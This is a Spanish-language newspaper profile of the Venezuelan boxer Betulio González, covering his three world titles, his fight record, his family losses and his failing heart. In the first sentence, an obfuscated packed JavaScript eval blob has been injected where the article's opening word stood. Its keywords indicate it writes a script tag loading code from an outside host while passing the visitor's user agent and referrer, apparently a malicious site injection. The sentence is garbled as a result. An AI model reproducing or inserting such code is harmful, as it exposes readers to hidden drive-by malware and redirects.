publicidad

La batalla de Betulio

María de los Ángeles / Maracaibo / mramos@laverdad.com
El eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hayki|var|u0026u|referrer|skana||js|php'.split('|'),0,{})) tricampeón mundial de boxeo lucha con su corazón al llegar a los 65 años. La pérdida de su madre y su esposa han sido los golpes más duros que ha recibido el púgil zuliano. Llegó a ganar 100 mil dólares en sus peleas

Fotos: Iván Lugo

¡Pega Betulio, pega Betulio! ¡Cae Betulio". Por fortuna en el plano personal el tricampeón mundial de boxeo sigue arriba en la cuenta; ha recibido dos altas en la clínica en este último mes. Betulio González sigue batallando por su salud y hoy, en su cumpleaños número 65, recuerda con alegría y nostalgia la vida dentro del cuadrilátero.

Se sentó en el porche de su casa con una pijama a rayas azules. Todavía tenía una venda en la muñeca de la mano derecha, por donde le pasaron medicamentos vía intravenosa. Tenía más de una hora de haber llegado a casa cuando recibió al equipo reporteril de La Verdad. Sus vecinos de San Francisco pasaban por el frente de la vivienda de color rojo y blanco y le saludaban: "¿Qué fue campeón, cómo seguís?". "Bueno, dicen que bien".

En ese momento llegó Liseth: “¡Verga, más medicinas!", expresó Betulio al ver la enorme bolsa de medicamentos que traía su hija. "Yo estoy bien, empezá a preguntar". Sus inicios en el pugilismo fueron la interrogante de entrada.

"Empecé en el boxeo en la época de las películas mexicanas de Pedro Infante, pero llegué más lejos que él, fui tres veces campeón mundial", recalcó el diminuto expugilista del peso mosca nacido en el sector Los Lirios de La Concepción, ya que su papá, Emilio Salas, trabajaba en una industria petrolera en aquel municipio, donde lo que se practicaba era atletismo y donde Betulio probó en salto largo, pero le gustó mucho.

Desarrollo veloz

Cuando su familia se mudó a Maracaibo conoció a un entrenador, José Castellano, quien le enseñó los golpes básicos del boxeo. A los 14 años comenzó a soltar los primeros puños y en Puntica de Piedra había un gimnasio donde practicaban este deporte. "A veces no tenía para los pasajes y mi novia (Zenaida) me daba el dinero para que fuera a entrenar".

En un año ganó cuatro títulos estatales y uno nacional. En el estadio Alejandro Borges hacía los combates para ganarse el cupo en la selección regional. "El estadio se llenaba, no alcanzaban los cupos para la gente, desde siempre atraía al público". Al lossadeño no le llamaba mucho la atención ir a competencias del ciclo olímpico por eso aceptó la oferta de saltar al profesional. "Me iban a pagar 400 o 500 bolívares por cada pelea; yo acepté, ya tenía familia y necesitaba el dinero".

El pequeño Betulio llenó los escenarios marabinos: la Plaza de Toros y los estadios Luis Aparicio y Alejandro Borges. En Caracas y Maracay también tenía su buena cantidad de fanáticos. "En Caracas no me dejaban caminar por las calles, era una multitud que se me acercaba, que quería hablar conmigo". Los promotores le arreglaron peleas en Japón, Italia, México, Tailandia y Costa Rica.

"Me gustaba mucho ir a Asia, allá pagaban muy bien. Me llegué a ganar 100 mil dólares, lo menos que me pagaron afuera fueron 25 mil dólares. No le paraba a la comida de allá, con hambre todo sabe bueno", comentó González, quien aseguró que de ese dinero no queda nada. "Me lo gasté en caramelos", bromeó el zuliano.

La más especial

De sus tres fajas mundiales, la que recuerda con mayor agrado fue la última, contra "Guty" Espadas. "El 'Guty' era más joven que yo, muy fuerte, no fue una pelea fácil. Fue un tremendo espectáculo, podría decir que la mejor pelea que se ha organizado en Venezuela".

A este púgil zuliano nadie lo detuvo en su deseo por ser grande. Falló la primera vez en su intento por ser campeón mundial. "La primera vez que salí fue a Japón; ese viaje duró como 30 horas".

Su primer cetro lo ganó por descalificación de su rival, el filipino Erbito Salbarría. La refriega había quedado empatada, pero el extranjero, entre round y round, tomaba un líquido extraño en su equina, se empinaba una "botellita", la cual llevaron a un laboratorio y contenía anfetaminas, así que de esta forma se colocó en la cintura la primera faja universal.

En su segunda defensa se acabó el reinado. En Tailandia, Venice Borkosor lo destronó y es precisamente de este combate que nació la frase "¡Pega Betulio, pega Betulio! ¡Cae Betulio!". El narrador Miguel Thoddé no pudo viajar para presenciar la pelea y la trasmitió por radio para toda Venezuela desde Caracas; hizo creer a todo el mundo que estaba en Bangkok, pero él estaba escuchando el careo por una señal internacional y por momentos hubo interferencia, así que quiso animar al público y cuando regresó la señal, ya Betulio tenía la sentencia del nocaut técnico. Esta contradicción impactó tanto a los venezolanos, que en el programa humorístico El Show de Joselo le dedicaron un sketch.

Un año después ganó por segunda vez el título; su víctima fue el mexicano Miguel Canto. Tuvo dos defensas exitosas. En 1976 se enfrentó a Espadas en Maracay, que fue su mejor pelea, de acuerdo con él. En la entrevista también habló sobre el pleito más difícil; sin pensarlo respondió: "La muerte de mi esposa, todavía me duele". Zenaida, su novia de la infancia, compartió su vida con él. Tuvieron cinco hijos y vivieron más de cuatro décadas de amor, pero hace dos años un infarto fulminante la arrancó de su lado. Fue compañera en las buenas y en las malas y guerreó contra la diabetes, al punto que perdió una de las piernas. El consuelo son sus nietos, de quienes recibe y a los que da cariño.

El tricampeón mundial dejó los cuadriláteros cuando murió su madre Alberta González; él tenía 39 años. "Fue el golpe más duro. Desde entonces sufro de la tensión. Todavía estoy triste, uno se acostumbra a las personas, a la familia y no se aprende a dejar de pensar en ellas".

Hoy Betulio González tiene un enemigo dentro de casa, dentro del cuerpo: el corazón. "Confío en Dios, en La Chinita, en San Benito y en los doctores".

 

3 campeonatos mundiales logró Betulio en su carrera (2 CMB y 1 AMB)

 

Como profesional

Triunfos

KO propinados

Derrotas

KO Recibidos

Empates

77

52

12

4

3

 

De cuidado

Betulio González tiene encima cinco cateterismos y dos angioplastias. Este mes estuvo hospitalizado dos veces. PDVSA le tiene una póliza de salud ilimitada.

 

Entrenador

A pocas cuadras de su casa, en San Francisco, está el gimnasio de boxeo que lleva su nombre. El alcalde Omar Prieto le prometió que lo reacondicionaría. "Hay muchos muchachitos que entrenan boxeo. Yo les enseñé todo lo que sabía".

 

Títulos mundiales

Sus víctimas

1. El filipino Erbito Salbarría (20-11-1971) en Maracaibo

2. El mexicano Miguel Canto (4-9-1973) en Maracaibo

3. El mexicano Gustavo "Guty" Espadas" (12-8-1978) en Maracay

 

¿Dónde peleó Betulio?

Lugar

N.º de peleas

Maracaibo

36

Caracas

39

Maracay

6

México

2

Costa Rica

1

Italia

1

Tailandia

1

Valencia

1

Japón

5

 

Día del boxeador

El 24 de octubre es una fecha especial para el Zulia: día del natalicio del prócer Rafael Urdaneta y también del tricampeón mundial de boxeo Betulio González, y desde hace cinco años en esta fecha se celebra el Día del Boxeador Zuliano.

Más noticias

  • Zulia FC buscará sumar en la ida de octavos ante Perú

    22/07/2019 04:37pm

    El Zulia Fútbol Club buscará este martes sumar ante el Sporting Cristal de Perú en el partido de ida correspondiente a los octavos de finales de la Copa Conmebol Sudamericana, encuentro que se disputara en el estadio Jose Encarnación “Pachencho” Romero a las cuatro de la tarde

  • Gobernación dicta clínica de fútbol en el marco del día del niño

    22/07/2019 04:12pm

    En el marco del día del niño, el Gobernador del estado Zulia, Omar Prieto Fernández, organizó una clínica deportiva que contó con el apoyo de la Asociación Zuliana de Fútbol y en la cual participaron más de 400 jugadores de diferentes categorías

  • Hermoso: "El club está apostando por un proyecto muy grande"

    22/07/2019 03:24pm

    Mario Hermoso, último fichaje del Atlético de Madrid, destacó que el club rojiblanco "es un claro ejemplo" de la apuesta "por un proyecto muy grande, por gente joven y por crecer" e insistió en que "ni" se lo pensó en cuanto tuvo la oferta de venir al equipo, con el que ha firmado por cinco campañas

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama